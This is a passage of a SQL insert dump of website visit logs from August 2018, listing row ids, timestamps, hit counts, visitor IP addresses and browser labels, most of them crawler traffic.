292425,1534894988,1,1,0,0,'54.36.148.211','other'),(292426,1534895015,1,1,0,0,'178.154.200.73','other'),(292427,1534895041,1,1,0,0,'54.36.149.54','other'),(292428,1534895049,1,1,0,0,'8.29.198.25','other'),(292429,1534895314,1,1,0,0,'54.36.149.34','other'),(292430,1534895360,1,0,1,0,'66.249.66.157',''),(292431,1534895406,1,1,0,0,'54.36.148.150','other'),(292432,1534895560,1,0,1,0,'66.249.66.155',''),(292433,1534895692,1,1,0,0,'54.36.148.104','other'),(292434,1534895762,1,1,0,0,'54.36.148.36','other'),(292436,1534895804,1,1,0,0,'54.36.149.27','other'),(292437,1534895887,1,1,0,0,'95.163.255.95','other'),(292438,1534896112,1,1,0,0,'54.36.149.0','other'),(292439,1534896184,1,1,0,0,'54.36.148.234','other'),(292440,1534896201,1,1,0,0,'54.36.148.78','other'),(292441,1534896213,1,1,0,0,'54.36.148.203','other'),(292442,1534896217,1,1,0,0,'178.154.171.88','other'),(292443,1534896294,1,1,0,0,'54.36.148.110','other'),(292444,1534896309,1,1,0,0,'54.36.148.72','other'),(292445,1534896515,1,1,0,0,'54.36.148.154','other'),(292446,1534896563,1,1,0,0,'66.249.66.59','chrome'),(292447,1534897025,1,1,0,0,'54.36.149.10','other'),(292448,1534897334,1,1,0,0,'54.36.149.85','other'),(292449,1534897625,2,0,2,0,'66.249.66.155',''),(292450,1534897687,1,1,0,0,'54.36.148.248','other'),(292451,1534897912,1,1,0,0,'54.36.148.233','other'),(292452,1534897988,1,1,0,0,'54.36.148.55','other'),(292453,1534898037,1,1,0,0,'54.36.148.24','other'),(292454,1534898080,2,0,2,0,'66.249.66.156',''),(292455,1534898087,1,1,0,0,'54.36.148.93','other'),(292456,1534898465,1,1,0,0,'54.36.148.127','other'),(292457,1534898861,1,1,0,0,'54.36.149.6','other'),(292458,1534899222,1,1,0,0,'54.36.148.63','other'),(292459,1534899270,1,1,0,0,'54.36.148.181','other'),(292460,1534899360,1,1,0,0,'54.36.148.88','other'),(292461,1534899723,1,1,0,0,'54.36.148.191','other'),(292462,1534899891,1,1,0,0,'54.36.149.98','other'),(292463,1534900041,1,1,0,0,'54.36.148.128','other'),(292464,1534900156,1,1,0,0,'54.36.148.206','other'),(292465,1534900266,1,1,0,0,'54.36.148.222','other'),(292466,1534900392,1,1,0,0,'54.36.148.247','other'),(292467,1534900525,1,1,0,0,'80.252.153.33','chrome'),(292468,1534900770,1,1,0,0,'54.36.148.28','other'),(292469,1534900840,1,1,0,0,'216.244.66.241','other'),(292470,1534900968,1,1,0,0,'54.36.148.37','other'),(292471,1534901012,1,1,0,0,'54.36.149.80','other'),(292472,1534901088,1,1,0,0,'54.36.148.121','other'),(292473,1534901171,1,1,0,0,'54.36.148.137','other'),(292474,1534901321,1,1,0,0,'87.250.224.46','other'),(292475,1534901773,1,1,0,0,'66.249.66.157','chrome'),(292476,1534901803,1,1,0,0,'54.36.148.164','other'),(292477,1534901806,1,0,1,0,'66.249.66.59',''),(292478,1534901918,1,1,0,0,'52.53.201.78','chrome'),(292479,1534901921,2,2,0,0,'141.8.142.74','other'),(292480,1534902044,1,1,0,0,'207.46.13.136','other'),(292481,1534902461,1,1,0,0,'54.36.148.216','other'),(292482,1534902719,1,1,0,0,'54.36.148.119','other'),(292483,1534902951,1,1,0,0,'54.36.148.101','other'),(292484,1534903095,1,1,0,0,'54.36.148.109','other'),(292485,1534903137,1,1,0,0,'66.249.66.61','chrome'),(292486,1534903139,1,1,0,0,'54.36.148.96','other'),(292487,1534903211,1,1,0,0,'54.36.149.34','other'),(292488,1534903586,18,18,0,0,'78.47.36.23','other'),(292489,1534903589,1,0,1,0,'66.249.66.156',''),(292490,1534903680,1,1,0,0,'141.8.142.74','other'),(292491,1534903685,1,1,0,0,'54.36.148.80','other'),(292492,1534904104,1,1,0,0,'54.36.148.122','other'),(292493,1534904305,1,0,1,0,'66.249.66.155',''),(292494,1534904472,1,1,0,0,'54.36.149.81','other'),(292495,1534904519,1,1,0,0,'54.36.149.91','other'),(292496,1534904697,1,1,0,0,'54.36.148.116','other'),(292497,1534904712,1,1,0,0,'54.36.148.129','other'),(292498,1534904883,1,1,0,0,'54.36.148.25','other'),(292499,1534905136,1,1,0,0,'54.36.148.18','other'),(292500,1534905649,1,0,1,0,'66.249.66.155',''),(292501,1534905796,1,1,0,0,'54.36.148.28','other'),(292502,1534905826,1,1,0,0,'54.36.149.101','other'),(292503,1534905881,1,1,0,0,'8.29.198.26','other'),(292504,1534906042,1,1,0,0,'54.36.148.234','other'),(292505,1534906127,1,1,0,0,'54.36.149.68','other'),(292506,1534906146,1,1,0,0,'54.36.148.219','other'),(292507,1534906295,1,1,0,0,'52.34.24.33','chrome'),(292508,1534906317,1,1,0,0,'54.36.148.60','other'),(292509,1534906428,1,1,0,0,'54.36.149.15','other'),(292510,1534906678,1,1,0,0,'54.36.149.100','other'),(292511,1534906826,1,1,0,0,'216.244.66.241','other'),(292512,1534906842,1,1,0,0,'91.209.11.236','other'),(292513,1534907074,1,1,0,0,'54.36.148.135','other'),(292514,1534907492,1,0,1,0,'66.249.66.155',''),(292515,1534907700,1,1,0,0,'54.36.148.85','other'),(292516,1534907830,1,1,0,0,'54.36.148.119','other'),(292517,1534907886,1,1,0,0,'141.8.142.74','other'),(292518,1534907896,1,1,0,0,'54.36.148.205','other'),(292519,1534907969,1,1,0,0,'54.36.148.40','other'),(292520,1534908149,1,1,0,0,'54.36.148.190','other'),(292521,1534908154,1,1,0,0,'54.36.148.128','other'),(292522,1534909026,1,1,0,0,'54.36.149.46','other'),(292523,1534909034,2,2,0,0,'178.154.171.88','other'),(292524,1534909192,1,1,0,0,'40.77.167.60','other'),(292525,1534909211,1,1,0,0,'141.8.142.74','other'),(292526,1534909334,1,1,0,0,'54.36.149.52','other'),(292527,1534909412,1,1,0,0,'54.36.148.148','other'),(292528,1534909632,1,0,1,0,'66.249.66.61',''),(292529,1534909829,1,1,0,0,'66.249.66.59','chrome'),(292530,1534909942,1,1,0,0,'54.36.148.213','other'),(292531,1534910005,1,1,0,0,'54.36.148.175','other'),(292532,1534910170,1,1,0,0,'54.36.148.131','other'),(292533,1534910241,1,1,0,0,'54.36.149.8','other'),(292534,1534910271,2,0,2,0,'66.249.66.155',''),(292535,1534910585,1,1,0,0,'54.36.149.105','other'),(292536,1534910919,1,1,0,0,'87.250.224.46','other'),(292537,1534911177,1,1,0,0,'54.36.149.64','other'),(292538,1534911180,1,1,0,0,'54.36.149.74','other'),(292539,1534911204,1,1,0,0,'54.36.148.162','other'),(292540,1534911239,1,0,1,0,'66.249.66.57',''),(292541,1534911326,1,0,1,0,'66.249.66.59',''),(292542,1534911442,1,1,0,0,'54.36.148.136','other'),(292543,1534911465,1,0,1,0,'66.249.66.61',''),(292544,1534911502,1,1,0,0,'54.36.148.115','other'),(292545,1534911532,2,0,2,0,'66.249.66.155',''),(292546,1534911805,1,1,0,0,'54.36.148.13','other'),(292547,1534912015,1,1,0,0,'40.77.167.60','other'),(292548,1534912249,1,1,0,0,'54.36.149.84','other'),(292549,1534912617,1,1,0,0,'141.8.142.74','other'),(292550,1534912758,1,1,0,0,'54.36.148.150','other'),(292551,1534913046,1,1,0,0,'91.196.177.46','chrome'),(292552,1534913505,1,1,0,0,'216.244.66.241','other'),(292553,1534913509,1,0,1,0,'66.249.66.157',''),(292554,1534913634,1,1,0,0,'54.36.148.210','other'),(292555,1534913643,1,1,0,0,'54.36.148.247','other'),(292556,1534913750,1,1,0,0,'66.249.66.59','chrome'),(292557,1534914236,1,1,0,0,'54.36.148.31','other'),(292558,1534914267,1,1,0,0,'54.36.149.24','other'),(292559,1534914314,1,1,0,0,'54.36.148.97','other'),(292560,1534914417,1,1,0,0,'54.36.148.109','other'),(292561,1534914521,1,1,0,0,'91.196.178.93','chrome'),(292562,1534914769,1,1,0,0,'54.36.148.250','other'),(292563,1534914781,1,1,0,0,'54.36.148.177','other'),(292564,1534914794,1,1,0,0,'141.8.142.74','other'),(292565,1534914980,1,1,0,0,'54.36.148.56','other'),(292566,1534915443,1,1,0,0,'178.154.171.88','other'),(292567,1534915569,1,1,0,0,'54.36.149.44','other'),(292568,1534915730,1,1,0,0,'54.36.149.18','other'),(292569,1534915891,1,0,1,0,'66.249.66.155',''),(292570,1534915921,1,1,0,0,'54.36.148.62','other'),(292571,1534916210,1,1,0,0,'54.36.149.86','other'),(292572,1534916717,1,1,0,0,'8.29.198.27','other'),(292573,1534916789,1,1,0,0,'66.102.9.136','chrome'),(292574,1534917118,1,1,0,0,'54.36.148.233','other'),(292575,1534917184,1,1,0,0,'178.154.171.88','other'),(292576,1534917223,1,1,0,0,'178.133.79.101','chrome'),(292577,1534917292,1,1,0,0,'54.36.148.143','other'),(292578,1534917340,1,1,0,0,'178.94.50.32','chrome'),(292579,1534917397,1,1,0,0,'54.36.148.198','other'),(292580,1534917566,1,1,0,0,'54.36.148.144','other'),(292581,1534917601,11,11,0,0,'40.77.167.60','other'),(292582,1534917616,1,1,0,0,'54.36.148.94','other'),(292583,1534917946,5,5,0,0,'40.77.167.193','other'),(292584,1534917947,1,1,0,0,'91.218.193.142','chrome'),(292585,1534917960,10,10,0,0,'207.46.13.136','other'),(292586,1534918143,1,1,0,0,'66.249.66.57','chrome'),(292587,1534918144,8,8,0,0,'207.46.13.91','other'),(292588,1534918156,1,1,0,0,'54.36.148.37','other'),(292589,1534918509,1,1,0,0,'54.36.148.72','other'),(292590,1534918605,1,1,0,0,'54.36.148.67','other'),(292591,1534918614,1,1,0,0,'91.196.178.166','chrome'),(292592,1534919167,1,1,0,0,'54.36.148.120','other'),(292593,1534919229,1,1,0,0,'54.36.149.79','other'),(292594,1534919276,1,1,0,0,'54.36.148.35','other'),(292595,1534919509,2,2,0,0,'91.196.178.164','chrome'),(292596,1534919635,1,1,0,0,'54.36.148.36','other'),(292597,1534919652,1,1,0,0,'54.36.148.84','other'),(292598,1534919696,1,1,0,0,'54.36.149.29','other'),(292599,1534919698,1,1,0,0,'54.36.148.232','other'),(292600,1534919940,1,1,0,0,'54.36.149.95','other'),(292601,1534919948,1,1,0,0,'54.36.149.2','other'),(292602,1534920053,1,1,0,0,'54.36.148.124','other'),(292603,1534920066,1,1,0,0,'94.153.229.229','other'),(292604,1534920172,1,1,0,0,'54.36.148.148','other'),(292605,1534920412,1,1,0,0,'91.196.178.164','chrome'),(292606,1534920542,1,1,0,0,'54.36.149.65','other'),(292607,1534921498,1,0,1,0,'66.249.66.59',''),(292608,1534921864,1,1,0,0,'54.36.148.208','other'),(292609,1534921959,1,1,0,0,'54.36.148.84','other'),(292610,1534922013,1,1,0,0,'54.36.149.55','other'),(292611,1534922277,2,2,0,0,'91.196.178.70','chrome'),(292612,1534922860,1,1,0,0,'178.133.72.11','chrome'),(292613,1534922964,1,1,0,0,'54.36.149.96','other'),(292614,1534923012,1,1,0,0,'37.115.207.158','firefox'),(292615,1534923016,1,1,0,0,'54.36.148.103','other'),(292616,1534923414,1,1,0,0,'94.178.106.132','firefox'),(292617,1534923693,1,1,0,0,'66.249.66.61','chrome'),(292618,1534923777,2,2,0,0,'54.36.149.80','other'),(292619,1534923952,1,1,0,0,'130.180.218.242','chrome'),(292620,1534924329,1,0,1,0,'66.249.66.59',''),(292621,1534924507,1,1,0,0,'54.36.148.239','other'),(292622,1534924652,1,1,0,0,'54.36.148.206','other'),(292623,1534925014,1,0,1,0,'66.249.66.155',''),(292624,1534925074,1,1,0,0,'54.36.149.51','other'),(292625,1534925130,1,1,0,0,'54.36.149.95','other'),(292626,1534925227,1,1,0,0,'54.36.148.13','other'),(292627,1534925270,1,1,0,0,'54.36.148.60','other'),(292628,1534925446,1,0,1,0,'66.249.66.157',''),(292629,1534925641,1,1,0,0,'54.36.149.8','other'),(292630,1534925758,1,1,0,0,'89.162.132.82','chrome'),(292631,1534926579,1,0,1,0,'66.249.66.155',''),(292632,1534926734,1,1,0,0,'178.95.67.148','chrome'),(292633,1534926809,1,1,0,0,'54.36.148.57','other'),(292634,1534927098,1,1,0,0,'54.36.149.17','other'),(292635,1534927122,1,1,0,0,'54.36.148.61','other'),(292636,1534927219,1,1,0,0,'54.36.148.223','other'),(292637,1534927547,1,1,0,0,'5.188.210.44','firefox'),(292638,1534927553,1,1,0,0,'8.29.198.25','other'),(292639,1534927874,1,1,0,0,'54.36.148.122','other'),(292640,1534927966,1,1,0,0,'54.36.148.131','other'),(292641,1534928033,1,1,0,0,'54.36.148.234','other'),(292642,1534928072,1,1,0,0,'54.36.149.36','other'),(292643,1534928450,1,1,0,0,'54.36.148.254','other'),(292644,1534928616,1,0,1,0,'66.249.66.155',''),(292645,1534928630,1,1,0,0,'185.191.204.7','chrome'),(292646,1534928775,1,1,0,0,'54.36.148.60','other'),(292647,1534928789,1,1,0,0,'54.36.148.200','other'),(292648,1534929074,1,1,0,0,'54.36.148.182','other'),(292649,1534929090,1,1,0,0,'207.46.13.180','other'),(292650,1534929164,1,1,0,0,'66.249.66.57','chrome'),(292651,1534929345,1,1,0,0,'95.163.255.191','other'),(292652,1534930035,1,1,0,0,'54.36.149.2','other'),(292653,1534930332,2,2,0,0,'216.244.66.241','other'),(292654,1534930598,1,1,0,0,'54.36.148.238','other'),(292655,1534930796,1,1,0,0,'54.36.148.213','other'),(292656,1534930859,1,1,0,0,'109.207.199.25','chrome'),(292657,1534930892,1,1,0,0,'54.36.148.75','other'),(292658,1534931151,1,1,0,0,'54.36.148.174','other'),(292659,1534931377,1,1,0,0,'216.244.66.241','other'),(292660,1534931470,1,1,0,0,'54.36.148.130','other'),(292661,1534931580,1,1,0,0,'54.36.148.89','other'),(292662,1534931614,1,1,0,0,'141.8.142.74','other'),(292663,1534932116,1,1,0,0,'46.211.134.10','chrome'),(292664,1534932130,1,1,0,0,'54.36.148.167','other'),(292665,1534932239,1,1,0,0,'95.163.255.96','other'),(292666,1534932255,1,1,0,0,'95.216.5.212','other'),(292667,1534932267,1,1,0,0,'54.36.148.22','other'),(292668,1534932304,1,0,1,0,'66.249.66.59',''),(292669,1534932312,1,1,0,0,'54.36.148.47','other'),(292670,1534932724,1,1,0,0,'141.8.142.74','other'),(292671,1534933238,1,1,0,0,'54.36.149.80','other'),(292672,1534933370,2,2,0,0,'95.213.141.126','opera'),(292673,1534933575,1,1,0,0,'54.36.148.23','other'),(292674,1534933871,1,1,0,0,'130.180.218.205','chrome'),(292675,1534933902,1,1,0,0,'66.249.66.57','chrome'),(292676,1534933994,1,1,0,0,'54.36.148.244','other'),(292677,1534934280,1,1,0,0,'207.46.13.180','other'),(292678,1534934340,2,2,0,0,'162.210.196.98','other'),(292679,1534934671,1,1,0,0,'54.36.149.73','other'),(292680,1534934718,1,1,0,0,'54.36.148.164','other'),(292681,1534934908,1,1,0,0,'54.36.148.191','other'),(292682,1534935003,1,1,0,0,'216.244.66.241','other'),(292683,1534935121,1,1,0,0,'54.36.149.85','other'),(292684,1534935736,1,1,0,0,'54.36.149.44','other'),(292685,1534936483,1,1,0,0,'54.36.149.38','other'),(292686,1534936966,1,1,0,0,'54.36.148.76','other'),(292687,1534937062,1,1,0,0,'46.200.65.62','chrome'),(292688,1534937081,2,2,0,0,'207.46.13.180','other'),(292689,1534937328,1,1,0,0,'54.36.148.246','other'),(292690,1534937329,1,1,0,0,'54.36.148.108','other'),(292691,1534937402,1,1,0,0,'54.36.149.27','other'),(292692,1534937492,1,1,0,0,'178.154.171.88','other'),(292693,1534937669,1,1,0,0,'54.36.148.25','other'),(292694,1534937782,1,1,0,0,'66.249.66.61','chrome'),(292695,1534938375,1,1,0,0,'54.36.148.206','other'),(292696,1534938377,1,1,0,0,'8.29.198.26','other'),(292697,1534938537,1,1,0,0,'91.196.178.164','chrome'),(292698,1534938599,1,1,0,0,'54.36.148.243','other'),(292699,1534938643,1,1,0,0,'54.36.149.96','other'),(292700,1534938774,1,0,1,0,'66.249.66.157',''),(292701,1534938815,1,1,0,0,'54.36.149.45','other'),(292702,1534938875,1,1,0,0,'54.36.148.74','other'),(292703,1534939055,1,1,0,0,'54.36.148.86','other'),(292704,1534939290,1,1,0,0,'54.36.149.52','other'),(292705,1534939426,1,1,0,0,'54.36.149.66','other'),(292706,1534939484,1,1,0,0,'54.36.148.166','other'),(292707,1534939500,3,3,0,0,'91.196.178.164','chrome'),(292708,1534939527,1,1,0,0,'54.36.148.37','other'),(292709,1534939725,1,1,0,0,'95.163.255.95','other'),(292710,1534939733,1,1,0,0,'141.8.142.74','other'),(292711,1534939885,1,1,0,0,'54.36.148.142','other'),(292712,1534940098,1,1,0,0,'176.107.196.32','chrome'),(292713,1534940156,1,1,0,0,'54.36.148.209','other'),(292714,1534940286,2,2,0,0,'91.196.177.15','chrome'),(292715,1534940570,1,1,0,0,'216.244.66.241','other'),(292716,1534940667,1,1,0,0,'141.8.142.74','other'),(292717,1534940817,1,1,0,0,'91.196.178.76','firefox'),(292718,1534940918,1,1,0,0,'213.180.203.8','other'),(292719,1534941324,1,1,0,0,'54.36.148.176','other'),(292720,1534941858,1,1,0,0,'54.36.148.234','other'),(292721,1534942020,1,1,0,0,'54.36.148.36','other'),(292722,1534942088,1,1,0,0,'54.36.148.235','other'),(292723,1534942156,1,1,0,0,'176.107.196.32','chrome'),(292724,1534942173,1,1,0,0,'54.36.149.101','other'),(292725,1534942251,1,1,0,0,'54.36.148.135','other'),(292726,1534942416,1,1,0,0,'46.201.166.66','chrome'),(292727,1534942668,1,1,0,0,'54.36.149.103','other'),(292728,1534942789,1,1,0,0,'54.36.149.34','other'),(292729,1534943307,2,2,0,0,'141.8.142.74','other'),(292730,1534943375,1,1,0,0,'54.36.148.17','other'),(292731,1534943415,1,1,0,0,'54.36.148.194','other'),(292732,1534943476,3,3,0,0,'95.135.17.30','chrome'),(292733,1534943615,1,1,0,0,'91.196.178.70','chrome'),(292734,1534943647,1,1,0,0,'176.120.43.132','firefox'),(292735,1534943739,1,1,0,0,'92.113.73.150','chrome'),(292736,1534943752,1,1,0,0,'216.244.66.241','other'),(292737,1534943935,1,1,0,0,'54.36.148.153','other'),(292738,1534943964,1,1,0,0,'54.36.148.239','other'),(292739,1534944115,1,1,0,0,'54.36.148.140','other'),(292740,1534944557,1,1,0,0,'54.36.148.60','other'),(292741,1534944630,1,1,0,0,'54.36.148.194','other'),(292742,1534944811,1,0,1,0,'66.249.66.57',''),(292743,1534944913,1,1,0,0,'91.196.178.79','firefox'),(292744,1534944918,1,1,0,0,'54.36.149.7','other'),(292745,1534945028,1,1,0,0,'54.36.149.100','other'),(292746,1534945160,1,1,0,0,'54.36.148.20','other'),(292747,1534945229,1,1,0,0,'54.36.148.218','other'),(292748,1534945236,1,1,0,0,'176.107.196.32','chrome'),(292749,1534945451,1,1,0,0,'54.36.148.188','other'),(292750,1534945538,1,1,0,0,'91.196.177.46','firefox'),(292751,1534945656,1,1,0,0,'178.154.171.88','other'),(292752,1534945657,1,1,0,0,'54.36.149.35','other'),(292753,1534945679,1,1,0,0,'54.36.149.57','other'),(292754,1534945961,2,2,0,0,'216.244.66.241','other'),(292755,1534945972,1,1,0,0,'54.36.148.87','other'),(292756,1534946179,3,3,0,0,'54.165.59.7','other'),(292757,1534946412,1,1,0,0,'54.36.149.66','other'),(292758,1534946496,2,2,0,0,'178.92.170.27','msie'),(292759,1534946527,1,1,0,0,'144.76.29.162','other'),(292760,1534946567,1,1,0,0,'54.36.149.37','other'),(292761,1534946728,1,1,0,0,'188.230.43.254','other'),(292762,1534946729,1,1,0,0,'54.36.148.95','other'),(292763,1534946968,1,0,1,0,'66.249.66.155',''),(292764,1534947454,1,1,0,0,'54.36.149.3','other'),(292765,1534947622,1,1,0,0,'195.190.152.251','chrome'),(292766,1534947652,1,1,0,0,'54.36.148.59','other'),(292767,1534947776,1,1,0,0,'46.200.58.139','chrome'),(292768,1534947901,1,1,0,0,'54.36.148.26','other'),(292769,1534948013,1,1,0,0,'91.196.178.70','chrome'),(292770,1534948066,1,1,0,0,'54.36.149.63','other'),(292771,1534948116,1,0,1,0,'66.249.66.156',''),(292772,1534948296,1,1,0,0,'54.36.149.20','other'),(292773,1534948603,1,1,0,0,'54.36.148.103','other'),(292774,1534948736,1,1,0,0,'54.36.149.92','other'),(292775,1534948818,1,1,0,0,'66.249.66.59','chrome'),(292776,1534949074,1,1,0,0,'54.36.148.192','other'),(292777,1534949087,1,1,0,0,'54.36.148.115','other'),(292778,1534949140,1,1,0,0,'188.230.43.254','other'),(292779,1534949162,1,1,0,0,'54.36.148.225','other'),(292780,1534949231,1,1,0,0,'8.29.198.27','other'),(292781,1534949328,1,1,0,0,'54.36.149.27','other'),(292782,1534949370,1,1,0,0,'54.36.149.24','other'),(292783,1534949496,1,1,0,0,'54.36.148.136','other'),(292784,1534949547,1,1,0,0,'54.36.148.96','other'),(292785,1534949553,1,1,0,0,'54.36.148.182','other'),(292786,1534949695,1,1,0,0,'54.36.148.152','other'),(292787,1534949887,2,2,0,0,'141.8.142.74','other'),(292788,1534950043,1,1,0,0,'54.36.148.198','other'),(292789,1534950096,1,1,0,0,'54.36.148.31','other'),(292790,1534950211,1,1,0,0,'54.36.148.233','other'),(292791,1534950285,1,1,0,0,'62.205.134.182','msie'),(292792,1534950643,1,1,0,0,'54.36.148.144','other'),(292793,1534951055,1,1,0,0,'178.154.171.88','other'),(292794,1534951135,1,1,0,0,'54.36.149.52','other'),(292795,1534951254,1,1,0,0,'54.36.149.95','other'),(292796,1534951533,1,1,0,0,'188.230.43.254','other'),(292797,1534951785,1,1,0,0,'54.36.148.26','other'),(292798,1534952064,1,1,0,0,'54.36.148.205','other'),(292799,1534952150,1,1,0,0,'54.36.149.96','other'),(292800,1534952247,1,1,0,0,'54.36.148.79','other'),(292801,1534952463,1,1,0,0,'54.36.148.54','other'),(292802,1534952487,1,1,0,0,'54.36.148.63','other'),(292803,1534952502,1,1,0,0,'141.8.142.74','other'),(292804,1534952506,1,1,0,0,'178.154.171.88','other'),(292805,1534952601,1,0,1,0,'66.249.66.157',''),(292806,1534952782,1,1,0,0,'54.36.148.213','other'),(292807,1534952849,1,1,0,0,'54.36.148.29','other'),(292808,1534952995,1,1,0,0,'54.36.148.214','other'),(292809,1534953147,1,1,0,0,'13.77.169.115','other'),(292810,1534953170,1,1,0,0,'54.36.148.82','other'),(292811,1534953485,1,0,1,0,'66.249.66.151',''),(292812,1534953549,1,1,0,0,'54.36.148.51','other'),(292813,1534953754,1,1,0,0,'66.249.66.59','chrome'),(292814,1534953937,1,1,0,0,'188.230.43.254','other'),(292815,1534954122,1,1,0,0,'54.36.149.85','other'),(292816,1534954342,1,1,0,0,'95.163.255.96','other'),(292817,1534954472,1,1,0,0,'54.36.148.153','other'),(292818,1534954599,1,1,0,0,'54.36.148.26','other'),(292819,1534954648,1,1,0,0,'54.36.149.0','other'),(292820,1534954708,1,1,0,0,'87.250.224.46','other'),(292821,1534954895,1,1,0,0,'54.36.148.120','other'),(292822,1534954928,1,1,0,0,'54.36.148.35','other'),(292823,1534954948,1,0,1,0,'66.249.66.155',''),(292824,1534955042,2,2,0,0,'141.8.142.74','other'),(292825,1534955908,1,1,0,0,'54.36.148.254','other'),(292826,1534956030,2,2,0,0,'141.8.142.74','other'),(292827,1534956033,1,1,0,0,'178.154.171.88','other'),(292828,1534956294,1,1,0,0,'95.174.64.156','firefox'),(292829,1534956781,1,1,0,0,'54.36.149.107','other'),(292830,1534956940,2,2,0,0,'178.154.171.88','other'),(292831,1534957387,1,1,0,0,'54.36.148.121','other'),(292832,1534957689,1,1,0,0,'54.36.149.8','other'),(292833,1534957710,1,1,0,0,'54.36.149.9','other'),(292834,1534957746,1,1,0,0,'141.8.142.74','other'),(292835,1534958031,1,1,0,0,'66.249.66.59','chrome'),(292836,1534958215,1,1,0,0,'54.36.148.225','other'),(292837,1534958311,1,1,0,0,'54.36.149.77','other'),(292838,1534958397,1,1,0,0,'54.36.148.84','other'),(292839,1534958459,1,1,0,0,'54.36.148.203','other'),(292840,1534958649,1,1,0,0,'141.8.142.74','other'),(292841,1534958929,1,1,0,0,'54.36.148.102','other'),(292842,1534959214,1,1,0,0,'54.36.149.54','other'),(292843,1534959351,1,1,0,0,'54.36.148.177','other'),(292844,1534959782,3,3,0,0,'141.8.142.74','other'),(292845,1534959791,1,1,0,0,'87.250.224.46','other'),(292846,1534960039,1,1,0,0,'54.36.148.181','other'),(292847,1534960064,1,1,0,0,'8.29.198.26','other'),(292848,1534960273,2,2,0,0,'91.196.178.48','chrome'),(292849,1534960300,1,1,0,0,'216.244.66.241','other'),(292850,1534960313,1,1,0,0,'54.36.148.218','other'),(292851,1534960420,1,1,0,0,'54.36.149.98','other'),(292852,1534960480,1,1,0,0,'54.36.149.5','other'),(292853,1534960616,1,1,0,0,'54.36.148.164','other'),(292854,1534960702,1,1,0,0,'54.36.148.197','other'),(292855,1534960717,1,1,0,0,'54.36.148.241','other'),(292856,1534960797,1,1,0,0,'141.8.142.74','other'),(292857,1534960810,1,1,0,0,'54.36.148.66','other'),(292858,1534960855,1,1,0,0,'95.163.255.99','other'),(292859,1534960998,1,1,0,0,'54.36.148.150','other'),(292860,1534961075,2,0,2,0,'66.249.66.61',''),(292861,1534961114,1,1,0,0,'91.196.178.181','chrome'),(292862,1534961343,1,1,0,0,'54.36.148.186','other'),(292863,1534961569,1,0,1,0,'66.249.66.57',''),(292864,1534961621,1,1,0,0,'54.36.149.1','other'),(292865,1534961623,2,0,2,0,'66.249.66.157',''),(292866,1534962216,1,1,0,0,'54.36.149.39','other'),(292867,1534962364,1,1,0,0,'95.163.255.185','other'),(292868,1534962411,1,1,0,0,'54.36.148.234','other'),(292869,1534962443,1,1,0,0,'207.46.13.180','other'),(292870,1534962466,1,1,0,0,'54.36.148.245','other'),(292871,1534962476,1,1,0,0,'92.113.189.235','chrome'),(292872,1534962827,1,1,0,0,'54.36.148.107','other'),(292873,1534962841,1,1,0,0,'54.36.149.71','other'),(292874,1534963031,1,1,0,0,'54.36.149.63','other'),(292875,1534963116,1,1,0,0,'54.36.148.163','other'),(292876,1534963166,1,1,0,0,'54.36.149.75','other'),(292877,1534963204,1,1,0,0,'54.36.148.33','other'),(292878,1534963397,1,1,0,0,'54.36.149.76','other'),(292879,1534963514,1,1,0,0,'54.36.149.25','other'),(292880,1534963794,1,1,0,0,'54.36.148.250','other'),(292881,1534963822,1,1,0,0,'54.36.148.254','other'),(292882,1534964180,1,1,0,0,'54.36.149.98','other'),(292883,1534964392,2,2,0,0,'46.175.254.55','other'),(292884,1534964393,1,1,0,0,'54.36.148.197','other'),(292885,1534964396,1,1,0,0,'54.36.149.5','other'),(292886,1534964464,1,1,0,0,'54.36.148.30','other'),(292887,1534964540,1,1,0,0,'54.36.148.235','other'),(292888,1534964579,1,1,0,0,'141.8.142.74','other'),(292889,1534964581,1,1,0,0,'54.36.148.253','other'),(292890,1534964931,1,1,0,0,'54.36.148.119','other'),(292891,1534964952,1,1,0,0,'54.36.148.81','other'),(292892,1534965147,1,1,0,0,'66.249.66.57','chrome'),(292893,1534965353,1,1,0,0,'54.36.149.4','other'),(292894,1534965555,1,1,0,0,'54.36.148.90','other'),(292895,1534965582,1,1,0,0,'54.36.148.115','other'),(292896,1534965609,2,2,0,0,'141.8.142.74','other'),(292897,1534965632,1,0,1,0,'66.249.66.156',''),(292898,1534965708,1,1,0,0,'54.36.149.16','other'),(292899,1534966707,1,1,0,0,'91.196.178.166','chrome'),(292900,1534967185,1,1,0,0,'178.154.171.88','other'),(292901,1534967273,1,1,0,0,'178.93.152.204','chrome'),(292902,1534968195,1,1,0,0,'207.46.13.180','other'),(292903,1534969269,1,1,0,0,'37.9.113.182','other'),(292904,1534969924,1,0,1,0,'66.249.66.37',''),(292905,1534970171,1,1,0,0,'207.46.13.180','other'),(292906,1534970825,2,2,0,0,'178.154.171.88','other'),(292907,1534970840,1,1,0,0,'66.249.66.61','chrome'),(292908,1534970892,1,1,0,0,'8.29.198.27','other'),(292909,1534971152,1,1,0,0,'141.8.142.74','other'),(292910,1534971638,1,1,0,0,'95.163.255.96','other'),(292911,1534972096,1,1,0,0,'141.8.132.19','other'),(292912,1534972686,1,1,0,0,'178.154.171.88','other'),(292913,1534972937,1,1,0,0,'163.172.4.153','chrome'),(292914,1534973164,1,1,0,0,'207.46.13.69','other'),(292915,1534973230,1,1,0,0,'216.244.66.241','other'),(292916,1534973312,1,1,0,0,'157.55.39.36','other'),(292917,1534974345,1,1,0,0,'46.185.3.48','other'),(292918,1534974759,1,1,0,0,'87.250.224.46','other'),(292919,1534975031,1,0,1,0,'66.249.66.61',''),(292920,1534975825,1,0,1,0,'66.249.66.156',''),(292921,1534976565,3,3,0,0,'141.8.142.74','other'),(292922,1534977103,2,0,2,0,'66.249.66.59',''),(292923,1534977386,1,1,0,0,'178.154.171.88','other'),(292924,1534977480,3,3,0,0,'141.8.142.74','other'),(292925,1534977700,1,0,1,0,'66.249.66.57',''),(292926,1534978253,1,0,1,0,'66.249.66.157',''),(292927,1534978321,1,0,1,0,'66.249.66.156',''),(292928,1534978363,1,1,0,0,'207.46.13.180','other'),(292929,1534978377,2,2,0,0,'178.154.171.88','other'),(292930,1534978410,1,1,0,0,'216.244.66.241','other'),(292931,1534978702,1,0,1,0,'66.249.66.57',''),(292932,1534978757,2,1,1,0,'66.249.66.57',''),(292933,1534979430,1,1,0,0,'87.250.224.46','other'),(292934,1534980073,1,1,0,0,'178.154.171.88','other'),(292935,1534981229,1,0,1,0,'66.249.66.157',''),(292936,1534981252,1,0,1,0,'66.249.66.57',''),(292937,1534981451,1,1,0,0,'216.244.66.241','other'),(292938,1534981726,1,1,0,0,'8.29.198.26','other'),(292939,1534983195,1,1,0,0,'178.154.171.88','other'),(292940,1534983535,1